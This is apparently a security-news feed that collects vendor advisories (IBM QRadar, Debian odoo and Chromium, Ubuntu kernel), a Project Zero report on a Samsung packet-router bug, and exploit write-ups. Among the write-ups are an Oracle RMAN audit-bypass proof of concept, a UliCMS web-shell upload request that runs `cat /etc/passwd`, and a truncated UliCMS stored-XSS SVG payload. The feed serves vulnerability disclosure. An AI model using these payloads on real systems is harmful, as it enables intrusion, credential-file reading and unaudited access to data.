IBM QRadar Data Synchronization App 1.0 through 3.0.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  IBM X-Force ID:  217370.

  

**Summary**

The product includes vulnerable components (e.g., framework libraries) that may be identified and exploited with automated tools. IBM QRadar Data Synchronization App for IBM QRadar SIEM has addressed the applicable CVEs.

**Vulnerability Details**

**CVEID:**   CVE-2022-22313  
**DESCRIPTION:**   IBM QRadar Data Synchronization App uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  
CVSS Base score: 4.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/217370 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2021-44906  
**DESCRIPTION:**   Node.js Minimist module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution in setKey() function in the index.js script. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 5.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222195 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2020-7598  
**DESCRIPTION:**   minimist could provide weaker than expected security, caused by a prototype pollution flaw. By sending a specially crafted request, a remote attacker could exploit this vulnerability to add or modify properties of Object.prototype.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/177780 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM QRadar Data Synchronization App

1.0 - 3.0.1

  

**Remediation/Fixes**

IBM encourages customers to update their systems promptly.

Update to 3.1.0

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

03 Apr 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSBQAC","label":"IBM Security QRadar SIEM"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"3.0.1","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2022-22313: Security Bulletin: IBM QRadar Data Synchronization App for IBM QRadar SIEM is vulnerable to using components with known vulnerabilities

Debian Linux Security Advisory 5399-1 - Several vulnerabilities were discovered in odoo, a suite of web based open source business apps.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5399-1                   security@debian.org  
https://www.debian.org/security/                       Sebastien Delafond  
May 05, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : odoo  
CVE ID         : CVE-2021-23166 CVE-2021-23176 CVE-2021-23178 CVE-2021-23186   
                 CVE-2021-23203 CVE-2021-26263 CVE-2021-26947 CVE-2021-44476   
                 CVE-2021-44775 CVE-2021-45071 CVE-2021-45111

Several vulnerabilities were discovered in odoo, a suite of web based  
open source business apps.

CVE-2021-44775, CVE-2021-26947, CVE-2021-45071, CVE-2021-26263:

  XSS allowing remote attacker to inject arbitrary commands.

CVE-2021-45111:

  Incorrect access control allowing authenticated remote user to  
  create user accounts and access restricted data.

CVE-2021-44476, CVE-2021-23166:

  Incorrect access control allowing authenticated remote administrator  
  to access local files on the server.

CVE-2021-23186:

  Incorrect access control allowing authenticated remote administrator  
  to modify database contents of other tenants.

CVE-2021-23178:

  Incorrect access control allowing authenticated remote user to  
  use another user's payment method.

CVE-2021-23176:

  Incorrect access control allowing authenticated remote user to  
  access accounting information.

CVE-2021-23203:

  Incorrect access control allowing authenticated remote user to  
  access arbitrary documents via PDF exports.

For the stable distribution (bullseye), these problems have been fixed in  
version 14.0.0+dfsg.2-7+deb11u1.

We recommend that you upgrade your odoo packages.

For the detailed security status of odoo please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/odoo

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmRU7kEACgkQEL6Jg/PV  
nWTQrAf+K6CpxmFeKM/7G70xafsw+lLu4UlaoLYUh55rgsFd9/YHUuwCHiCmoP1P  
4GnVJkNu6qj8rW1EReUtKZ76XQTLsD9ZxgM6tFBGA9EDi0hPjR4KEI7jtdXjx9ro  
8LOyu51xeqoraKTmkPw+EnUCWCjutH78l8y9ywqHORQI0WM9Q2Zh0fHJz1c+2uzd  
HqFvo1brOgu7zkI3luH8IjEHpCHpUVbe8rTnY0g2PSrZott/k0fIZ8qNSzyfG7ah  
R5auoI5y+z5TusByKWnQ48jQCbU8WeqXaQUqT/pGtjGz9ljClTwDkmqqv/6BNnyF  
Et5uV+Yn6UWsxXUcz6u9CwOzkrpVxA==  
=KDFV  
-----END PGP SIGNATURE-----

Debian Security Advisory 5399-1

Proof of concept exploit for Oracle RMAN on Oracle database versions 19c, 18c, 12.2.0.1, and 12.1.0.2 where recovery actions are not adequately logged.

Title: CVE-2020-2978 - Oracle RMAN Audit table point in time recovery not recorded  
Product:                   Database  
Manufacturer:              Oracle  
Affected Version(s):       12.1.0.2, 12.2.0.1, 18c, 19c  
Tested Version(s):         19c  
Risk Level:                Medium  
Score:                     4.1  
Solution Status:           Fixed  
CVE Reference:             CVE-2020-2978  
Author of Advisory:        Emad Al-Mousa

Overview:

Audit failure is a security weakness in software product especially if a security audit is in-place to detect a certain operation. Oracle RMAN is  
a database Recovery Manager utility for backup and restore operations, so any security weakness/vulnerability can be exploited by insider threat or  
external attacker to view confidential data in unauthorized manner.

*****************************************  
Vulnerability Details:

The scope of this security research is to detect if a database administrator tried to restore a "sensitive table" (already in-place auditing is configured against SELECT statements against this sensitive table).   
The following research illustrates that despite RMAN operations are audited by “default” in pure “Unified Auditing” mode, the table point of time recovery activity/action was not logged in the audit logs.   
As a result, any trails for future forensic investigation or real time security operations monitoring for activities against highly confidential sensitive table will not be met.

*****************************************  
Proof of Concept (PoC):

// I will check first if Unified Auditing feature is enabled in an Oracle database system:

SQL> select value from v$option where parameter ='Unified Auditing';

 VALUE  
----------------------------------------------------------------  
TRUE

  SQL> select * from DBA_AUDIT_MGMT_CONFIG_PARAMS where PARAMETER_NAME = 'AUDIT WRITE MODE';

 PARAMETER_NAME  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
PARAMETER_VALUE  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
AUDIT_TRAIL  
----------------------------  
AUDIT WRITE MODE  
IMMEDIATE WRITE MODE  
UNIFIED AUDIT TRAIL

// I will create linux shell script to restore a sensitive database table with different name , you will need to access the Linux OS as DBA linux account  
for the exploit to work ....the sensitive table is called "dummy" under schema called "DBA" and the attacker will restore it with different name --->  
dummy_55:

 touch /tmp/dbtest/resotre.sh

chmod 700 /tmp/dbtest/resotre.sh

vi  /tmp/dbtest/resotre.sh

 #!/bin/sh  
export ORACLE_SID=dbtest  
export ORACLE_HOME=/orcl/dbtest/product/18.3  
export RMAN_LOG_FILE=/tmp/dbtest/aux_db/db_restore.log  
RMAN=$ORACLE_HOME/bin/rman  
CMD_STR="  
ORACLE_HOME=$ORACLE_HOME  
export ORACLE_HOME  
ORACLE_SID=$ORACLE_SID  
export ORACLE_SID  
$RMAN target \/ msglog $RMAN_LOG_FILE append << EOF  
connect CATALOG $RCVCAT_CONNECT_STR  
run {  
recover table dba.dummy  
#until scn 56330407409  
until time \"to_date('23-JAN-2020 08:00:00','DD-MON-YYYY HH24:MI:SS')\"  
auxiliary destination '/tmp/dbtest/aux_db'  
remap table dba.dummy:dummy_55;  
}  
EOF  
"  
/usr/bin/sh -c "$CMD_STR" >> $RMAN_LOG_FILE

// then run the shell script:

/tmp/dbtest/resotre.sh

  // Log File /tmp/dbtest/aux_db/db_restore.log shows the restore is successful:

 auxiliary instance file /tmp/dbtest/aux_db/JTVB_PITR_dbtest/onlinelog/o1_mf_1_h2lopldq_.log deleted  
auxiliary instance file /tmp/dbtest/aux_db/JTVB_PITR_dbtest/datafile/o1_mf_ts_user__h2locvjr_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_sysaux_h2lncb1c_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_ts_undo__h2lnlrw7_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_system_h2lncb14_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_system_h2lncbvp_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/controlfile/o1_mf_h2ln7ftc_.ctl deleted  
auxiliary instance file tspitr_jtvb_19868.dmp deleted  
Finished recover at 01/23/2020-11:19:30

 RMAN> RMAN>

 Recovery Manager complete. 

// you can now access the sensitive table and query data:

sqlplus / as sysdba

SQL> select * from dba.dummy_55;

// Checking the unified audit trail:

 SQL> select EVENT_TIMESTAMP, ACTION_NAME, RMAN_SESSION_STAMP, RMAN_OPERATION,RMAN_OPERATION,RMAN_OBJECT_TYPE  
from unified_audit_trail where ACTION_NAME like '%RMAN%' order by 1;

 The RMAN session is logged in the audit table, but there is NO details of what kind of RMAN operation took place ?!

Conclusion:

SystemAdmin/Attacker can view sensitive data without being audited which will impact forensic investigation, and threat detection.

*****************************************  
References:  
https://www.oracle.com/security-alerts/cpujul2020.html  
https://nvd.nist.gov/vuln/detail/CVE-2020-2978  
https://databasesecurityninja.wordpress.com/2020/12/01/cve-2020-2978-rman-audit-table-point-in-time-recovery-not-logged/

Oracle RMAN Missing Auditing

Ubuntu Security Notice 6058-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel did not properly perform filter deactivation in some situations. A local attacker could possibly use this to gain elevated privileges.

    ==========================================================================Ubuntu Security Notice USN-6058-1May 05, 2023linux-aws, linux-aws-hwe vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 ESMSummary:The system could be made to run programs as an administrator.Software Description:- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systemsDetails:It was discovered that the Traffic-Control Index (TCINDEX) implementationin the Linux kernel did not properly perform filter deactivation in somesituations. A local attacker could possibly use this to gain elevatedprivileges. Please note that with the fix for this CVE, kernel support forthe TCINDEX classifier has been removed.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   linux-image-4.15.0-1155-aws     4.15.0-1155.168   linux-image-aws-lts-18.04       4.15.0.1155.153Ubuntu 16.04 ESM:   linux-image-4.15.0-1155-aws     4.15.0-1155.168~16.04.1   linux-image-aws-hwe             4.15.0.1155.138After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6058-1   CVE-2023-1829Package Information:   https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1155.168

Ubuntu Security Notice USN-6058-1

Debian Linux Security Advisory 5398-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5398-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 04, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-2459 CVE-2023-2460 CVE-2023-2461 CVE-2023-2462                  CVE-2023-2463 CVE-2023-2464 CVE-2023-2465 CVE-2023-2466                  CVE-2023-2467 CVE-2023-2468Debian Bug     : 992178 1031352Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 113.0.5672.63-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRUCKIACgkQEMKTtsN8TjbOCg/7BvJxNQVuHLPhC7gcECOh0c9kCZf8bXzsLubVAsoA5t7dj/v8s9KYvXbwYzopwZcIshx5r4B0S59bfTGNEq60mjdaPDMc4seUh9Tb7ubE6CZxPCqNyuOKE72LZFpLxymyknSS/E6yxUh4CeM5jcf5F9fmtnrPXM+WiXRwMU2KiPVBuyleGEL1Om1b3tD6u67fFBoffP+VdvLdxo42GOBSiaqAVenS00wygli1qisU6i7mifQX5uc1qnImDhQ1LLajrNCdvIL3ILYpuimYzfWTqWz+UIVvTotaCk8FuxP9/LjAS2Rdk40PL8rhxS09eSpMb49WSi3rPzfGkkzwjPk/7rkCX/zB2n3gxn6m4fnOP9tjmQxSQmIot0xW1HjLT+0GIg2lHNrsRemuArLfqqgw3b3Widv6k8nC+2JN05yFEgNDnhZes9YXESMm6yGkbQXQZv6cCY6VKxPeQpXh2IWdK1K32R1I+faJmvL+mj1GAqCFzSGn0QH/vYinQ5nmvK1oh7SZuHWw2uIyqBwHVIz+D7PNjjd73kxXew8nt5WmPvziD0hsFBxsv3q/rn26QRSlcCqMkT6vdQAlI3vvYyd27njQqbkuKnIpiU1DqWkvqoaQ4dvqhf4QN1nteH75B6w+Mln1NDll/aCb4DvglNq1t7vwLrwF/1V7cvDmmTLd0zA==Mdwu-----END PGP SIGNATURE-----

Debian Security Advisory 5398-1

wfc-pkt-router suffers from a vulnerability where it can wrongly bind to an external network interface instead of the VPN tunnel.

wfc-pkt-router can wrongly bind to external network interface instead of VPN tunnel

There is a daemon called \"wfc-pkt-router\" (the \"IMS packet router daemon\" according to https://github.com/ItsLynix/samsung_a53x_dump/blob/36de1bc4f9a9b3646809805b9feaf2f4396177e5/vendor/etc/init/init.s5e8825.rc) on some Samsung-based phones, including Pixel 7 and (according to that github link) Samsung a53xnaxx (?). When WiFi Calling is active, this daemon is responsible for forwarding IP packets between the baseband (/dev/umts_wfc1 on Pixel 7) and an IPSec tunnel provided by Android. wfc-pkt-router creates a raw socket bound to a specific interface (using SO_BINDTODEVICE) and forwards raw IP packets between the interface-bound socket and the baseband (/dev/umts_wfc1).

Some other mechanism outside wfc-pkt-router (I have no idea how that works) apparently causes Android to set up an IPSec tunnel with a local IP address that is also known to the baseband. When the baseband starts using an IPSec tunnel via wfc-pkt-router, it has to tell wfc-pkt-router which interface to bind to. The baseband does this by telling wfc-pkt-router the local IP address of the IPSec tunnel; wfc-pkt-router then scans through the list of network interfaces (using getifaddrs()) and searches for a matching interface. If multiple interfaces match, it picks the *newest* interface with the right IP address.

The main problem with this is that multiple interfaces can have the same local IP address. IPSec interfaces are created dynamically, so they are typically created later than WiFi interfaces or such, which means an address collision with a WiFi interface is not a problem *as long as the IPSec interface exists*; but the interfaces associated with USB ethernet adapters or VPN apps can be dynamically created after the IPSec interface creation.

I have experimentally tested on a Pixel 7 that, if a USB ethernet adapter is inserted after the IPSec interface was created, and the DHCP server assigns the same IP address that is also used for the IPSec tunnel, traffic intended for the IPSec tunnel flows bidirectionally between the baseband and the ethernet adapter - I saw an outgoing SIP connection attempt that I could intercept and reply to. (This requires that the IP address used inside IPSec is IPv4 - I have seen one provider that uses IPv4 inside the IPSec tunnel and another one that uses IPv6.)

I recommend that you give wfc-pkt-router the right interface name somehow instead of letting it search for the right interface based on IP address.

--- Additional Comments ---

Because of the bug, the baseband's SIP connection does *NOT* go through the IPSec tunnel. So the protections provided by IPSec become irrelevant.

The normal flow of data for wifi calling is like this:

1. baseband generates a TCP SYN packet  
2. baseband puts the TCP SYN packet in an unencrypted IP packet  
3. baseband sends the unencrypted IP packet to wfc-pkt-router (on the AP)  
4. wfc-pkt-router sends the unencrypted IP packet to "ipsec*" network interface  
5. Linux kernel IPSec/xfrm layer encrypts the IP packet  
6. Linux kernel sends encrypted IP packet over wifi or whatever

But when the bug is hit, the data flow is instead like this:

1. baseband generates a TCP SYN packet  
2. baseband puts the TCP SYN packet in an unencrypted IP packet  
3. baseband sends the unencrypted IP packet to wfc-pkt-router (on the AP)  
4. wfc-pkt-router sends the unencrypted IP packet to eth0 network interface

So the unencrypted IP packet from the baseband is directly sent out of the phone. The other direction works the same way.

Samsung Device Solution BU's PSIRT (dsprodsec) let me know that they plan to list this in their bulletin as:

CVE-2023-29092  
Improper handling of  parameters while binding network interface  
Exynos Mobile Processor and  Modem  
Exynos Modem 5123, Exynos Modem 5300, Exynos 980, Exynos 1080  
Denial of Service  
Attacker insert malicious configured USB ethernet adapter  
Binding wrong resource can occur due to improper handling of parameters while binding network interface  
3.1 Low CVSS:3.1/AV:P/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L

https://source.android.com/docs/security/bulletin/pixel/2023-04-01 says CVE-2023-29092 was fixed at the 2023-04-05 patch level.

This bug is subject to a 90-day disclosure deadline. If a fix for this  
issue is made available to users before the end of the 90-day deadline,  
this bug report will become public 30 days after the fix was made  
available. Otherwise, this bug report will become public at the deadline.  
The scheduled deadline is 2023-05-08.

Related CVE Numbers: CVE-2023-29092wasfixedatthe2023-04-05patchlevel,CVE-2023-29092.

Found by: jannh@google.com

wfc-pkt-router Incorrect Bind

Ubuntu Security Notice 6057-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the OverlayFS implementation in the Linux kernel did not properly handle copy up operation in some conditions. A local attacker could possibly use this to gain elevated privileges.

==========================================================================  
Ubuntu Security Notice USN-6057-1  
May 05, 2023

linux-intel-iotg vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-intel-iotg: Linux kernel for Intel IoT platforms

Details:

It was discovered that the Traffic-Control Index (TCINDEX) implementation  
in the Linux kernel contained a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-1281)

It was discovered that the OverlayFS implementation in the Linux kernel did  
not properly handle copy up operation in some conditions. A local attacker  
could possibly use this to gain elevated privileges. (CVE-2023-0386)

Haowei Yan discovered that a race condition existed in the Layer 2  
Tunneling Protocol (L2TP) implementation in the Linux kernel. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-4129)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

It was discovered that the NTFS file system implementation in the Linux  
kernel contained a null pointer dereference in some situations. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2022-4842)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

It was discovered that the Human Interface Device (HID) support driver in  
the Linux kernel contained a type confusion vulnerability in some  
situations. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1073)

It was discovered that a memory leak existed in the SCTP protocol  
implementation in the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2023-1074)

It was discovered that the NFS implementation in the Linux kernel did not  
properly handle pending tasks in some situations. A local attacker could  
use this to cause a denial of service (system crash) or expose sensitive  
information (kernel memory). (CVE-2023-1652)

Lianhui Tang discovered that the MPLS implementation in the Linux kernel  
did not properly handle certain sysctl allocation failure conditions,  
leading to a double-free vulnerability. An attacker could use this to cause  
a denial of service or possibly execute arbitrary code. (CVE-2023-26545)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1028-intel-iotg  5.15.0-1028.33  
   linux-image-intel-iotg          5.15.0.1028.27

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6057-1  
   CVE-2022-4129, CVE-2022-47929, CVE-2022-4842, CVE-2023-0386,  
   CVE-2023-0394, CVE-2023-1073, CVE-2023-1074, CVE-2023-1281,  
   CVE-2023-1652, CVE-2023-26545

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1028.33

Ubuntu Security Notice USN-6057-1

UliCMS version 2023-1 Sniffing-Vicuna suffers from a remote shell upload vulnerability.

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)  
#Application: Ulicms  
#Version: 2023.1-sniffing-vicuna  
#Bugs:  RCE  
#Technology: PHP  
#Vendor URL: https://en.ulicms.de/  
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip  
#Date of found: 04-05-2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux 

2. Technical Details & POC  
========================================  
steps: 

1. Login to account and edit profile.

2.Upload new Avatar

3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error

payload: <?php echo system("cat /etc/passwd"); ?>

poc request :

POST /dist/admin/index.php HTTP/1.1  
Host: localhost  
Content-Length: 1982  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv  
Connection: close

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="csrf_token"

e2d428bc0585c06c651ca8b51b72fa58  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sClass"

UserController  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sMethod"

update  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="avatar"; filename="salam.phar"  
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="edit_admin"

edit_admin  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="id"

12  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="firstname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="lastname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="email"

account1@test.com  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password_repeat"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="group_id"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="secondary_groups[]"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="homepage"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="html_editor"

ckeditor  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="admin"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="default_language"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="about_me"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy--

response:

Error  
GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67  
Stack trace:  
#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#7 {main}

Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73  
Stack trace:  
#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#6 {main}

4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)

UliCMS 2023-1 Sniffing-Vicuna Shell Upload

UliCMS version 2023-1 Sniffing-Vicuna suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:  Stored Xss#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /dist/admin/fm/upload.php HTTP/1.1Host: localhostContent-Length: 663sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABClX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: 